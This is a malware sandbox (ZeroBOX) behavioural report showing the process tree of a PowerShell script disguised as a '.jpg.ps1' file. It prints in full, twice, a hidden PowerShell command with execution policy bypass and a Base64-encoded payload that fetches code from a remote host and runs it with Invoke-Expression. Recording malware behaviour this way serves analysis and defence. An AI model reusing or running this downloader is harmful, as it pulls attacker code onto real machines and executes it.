| ZeroBOX

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\ef9b73d4c7e0eb1eaf832e6b801a8d79.jpg.ps1
2556
- powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
  2700
- cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JABpAG4AaQBiAGIAaAA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIATAAyAFoAcABiAEcAVQB2AGMASABNAHYATQBUAGMAeQBOAFQAYwA1AE8ARwBNADAATQBXAFIAawBOAGoAQgBqAE4AVwBJADUATwBHAFEANQBPAEQARQAwAE4ARABSAGwATQBHAFEANABZAGoAUQB1AGEAbgBCAG4AIgApACkAOwAKACQAbABrAGQAbQBxAHAAdgBoAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAdABlAFcAUgBoAGQARwBGADUAZQBHADUAbwBlAG0ATgB6AEwAbgBSAGwAWQAyAGcAPQAiACkAKQA7AAoAJAB1AHIAaQAgAD0AIAAoACQAbABrAGQAbQBxAHAAdgBoACAAKwAgACQAaQBuAGkAYgBiAGgAKQA7AAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADsACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAAoAewAKAAkAdAByAHkAewAKAAkACQAkAGMAbwBuAHQAZQBuAHQAIAA9ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGkAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABjAG8AbgB0AGUAbgB0ADsACgAJAAkAYgByAGUAYQBrADsACgAJAH0ACgAJAGMAYQB0AGMAaAAKAAkAewAKAAkACQAkAGMAbwB1AG4AdAAgAC0APQAgADEAOwAKAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADUAOwAKAAkAfQAKAH0ACgA=
  2812
  - powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JABpAG4AaQBiAGIAaAA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIATAAyAFoAcABiAEcAVQB2AGMASABNAHYATQBUAGMAeQBOAFQAYwA1AE8ARwBNADAATQBXAFIAawBOAGoAQgBqAE4AVwBJADUATwBHAFEANQBPAEQARQAwAE4ARABSAGwATQBHAFEANABZAGoAUQB1AGEAbgBCAG4AIgApACkAOwAKACQAbABrAGQAbQBxAHAAdgBoAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAdABlAFcAUgBoAGQARwBGADUAZQBHADUAbwBlAG0ATgB6AEwAbgBSAGwAWQAyAGcAPQAiACkAKQA7AAoAJAB1AHIAaQAgAD0AIAAoACQAbABrAGQAbQBxAHAAdgBoACAAKwAgACQAaQBuAGkAYgBiAGgAKQA7AAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADsACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAAoAewAKAAkAdAByAHkAewAKAAkACQAkAGMAbwBuAHQAZQBuAHQAIAA9ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQByAGkAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnADsACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABjAG8AbgB0AGUAbgB0ADsACgAJAAkAYgByAGUAYQBrADsACgAJAH0ACgAJAGMAYQB0AGMAaAAKAAkAewAKAAkACQAkAGMAbwB1AG4AdAAgAC0APQAgADEAOwAKAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADUAOwAKAAkAfQAKAH0ACgA=
    2888

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents